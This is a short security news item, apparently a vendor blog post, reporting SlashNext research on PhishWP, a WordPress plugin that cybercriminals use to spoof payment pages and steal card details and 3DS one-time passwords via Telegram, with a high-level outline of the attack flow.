Researchers at SlashNext warn that cybercriminals are using a WordPress plugin called “PhishWP” to spoof payment pages and steal financial information.
The spoofed pages are designed to steal payment card numbers, expiration dates, CVVs, and billing addresses. The plugin can also intercept one-time passwords generated to secure the transactions.
The stolen data is immediately sent to the crooks via Telegram as soon as the victim hits “enter” on the phishing page.
“Attackers can either compromise legitimate WordPress websites or set up fraudulent ones to install it,” SlashNext explains. “After configuring the plugin to mimic a payment gateway, unsuspecting users are lured into entering their payment details.
The plugin collects this information and sends it directly to attackers, often in real time. PhishWP also uses advanced tricks, like stealing the special OTP sent during a 3D Secure (3DS) check during the checkout process. 3DS is a safety measure that sends a short code to your phone or email to prove that you’re the actual cardholder. By grabbing this code, attackers can pass themselves off as you, making their fake transactions look completely real.”
The researchers outline the attack flow as follows:
- Set up on a WordPress site: Attackers either break into a trusted WordPress site or create their own fake one
- Copy a real payment service: They use PhishWP to make checkout pages look just like a real payment processor (like Stripe), adjusting the design and language so nothing seems off about the branding, fields, or language
- Lure victims in: Victims arrive at the site through carefully planned phishing emails, social media ads, or sneaky search results. Everything looks normal, so they enter their payment and personal details without a second thought
- Steal the data: PhishWP scoops up all the sensitive information—credit card numbers, addresses, even special security codes—and instantly sends it to the attacker, often via Telegram
- Cover the tracks: The victim then receives a fake confirmation email, making them believe their purchase went through. Meanwhile, the attacker uses or sells the stolen info in secret online markets
KnowBe4 empowers your workforce to make smarter security decisions every day. Over 70,000 organizations worldwide trust the KnowBe4 platform to strengthen their security culture and reduce human risk.
SlashNext has the story.
